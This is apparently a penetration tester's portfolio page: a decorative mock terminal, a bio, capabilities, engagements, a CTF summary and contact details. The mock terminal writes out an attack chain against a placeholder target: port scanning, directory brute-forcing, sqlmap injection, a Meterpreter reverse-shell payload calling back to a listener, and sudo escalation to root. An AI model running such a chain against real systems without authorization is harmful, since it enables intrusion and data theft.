$ whoami
prathamesh-dabir // penetration tester
$ nmap -sS -T4 -p- 10.0.0.0/8
Scanning 65535 ports... [||||||||||] 100%
443/tcp open https
22/tcp open ssh
80/tcp filtered http
$ gobuster dir -u https://target.sys -w rockyou.txt
/admin (Status: 200)
/api (Status: 200)
/debug (Status: 200)
$ sqlmap -u "https://target.sys/api?id=1" --batch --level=5
[+] Parameter: id (GET) - Type: UNION query
[+] Database: prod_db
[+] Users table: 14,892 records
$ ./exploit --payload meterpreter --lhost 10.0.0.1 --lport 4444
[+] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.5:58932)
$ getuid
Server username: www-data (uid=33, gid=33)
$ sudo -l
(ALL) NOPASSWD: ALL
$ sudo su -
uid=0(root) gid=0(root) groups=0(root) ★ ROOT ACCESS ★
I BREAK THINGS
TO UNDERSTAND THEM.
Think like an attacker.// OPERATING PRINCIPLE — EVERY ENGAGEMENT
Defend like an engineer.
- CALLSIGN
- prathamesh-dabir
- ROLE
- Penetration Tester
- EDUCATION
- M.Sc Cybersecurity
- THM INDIA
- TOP 10 ★
- STATUS
- ● OPEN TO OPS
UID 0 (root) GROUPS: pentest, bounty, ctf, secops CLEARANCE: LEVEL-5 // TOP-10 IN ACCESS: web · net · cloud · people EXP: NEVER
PROPERTY OF A CURIOUS MIND.
IF FOUND, RETURN TO THE NEAREST TERMINAL.
Passionate cybersecurity professional with over three years of hands-on experience across penetration testing, vulnerability assessment and security operations. I thrive on solving complex security challenges and protecting organizations from evolving threats.
Ranked Top 10 on TryHackMe India, I live on the offensive side — bug bounty hunting, CTF competitions and platforms like HackTheBox Academy. Offensively minded, defensively useful. Off the clock I trade stocks, chasing market patterns the same way I chase attack vectors: patiently and analytically.
What I do
//CAPABILITIES — OFFENSE INFORMS DEFENSEPenetration Testing
- Web App Pentesting
- Network Penetration
- Vulnerability Assessment
- External Pentest Playbook (TCM)
Bug Bounty Hunting
- Recon & Enumeration
- Web & API Testing
- Responsible Disclosure
- Report Writing
Security Operations
- SecOps Research
- SaaS Security Posture
- CASB / Netskope
- Threat Monitoring
CTF & Community
- TryHackMe Top 10 India
- HackTheBox Academy
- Metasploit Guest Sessions
- Security Writeups
Method,
made visible.
A good assessment is designed like a good interface: every signal has a place, every decision has context, and the final output is impossible to misread.
09:41:02 target verified inside signed scope
09:48:17 reproducible exploit path recorded
10:03:54 business impact mapped to control
10:16:31 remediation guidance attached
Field Ops
//SELECTED ENGAGEMENTS & ROLESTryHackMe — India Top 10
AricaTech Security — CTO
Suryadatta Group — Professor
Bug Bounty Programs
Safe Security — SecOps Intern
Pickle
Rick.
Source review, credential discovery, PHP command execution, blacklist bypass, Linux enumeration, and an unrestricted sudo path to root.
Credentials
//CERTS · RANKS · BADGESSeen in
the wild.
A syndicated feature on Arica Tech Security's AI-native security mission names me as CTO and highlights my work across cybersecurity, AI/ML, and offensive security research.
READ THE FEATURE ↗Intel Drops
//NOTES FROM THE FIELDNo blog posts published yet.
Approved articles will appear here automatically after publication.
THE
SIGNAL
One transmission a month. Raw field notes from live engagements, the bugs that actually paid, CTF breakdowns, and the occasional market chart. No fluff, no spam — just intel you can use. Free. Unsubscribe anytime.
Let's
talk.
Got a project, a bounty, or need someone to red-team your stack? Fill out the form or hit me up directly — I'll get back to you soon.
DAILYHUNTOPEN COVERAGE ↗
REPUBLIC NEWS INDIAOPEN COVERAGE ↗
THE INDIAN BULLETINOPEN COVERAGE ↗
INDIA UPTURNOPEN COVERAGE ↗
HINDUSTAN METROOPEN COVERAGE ↗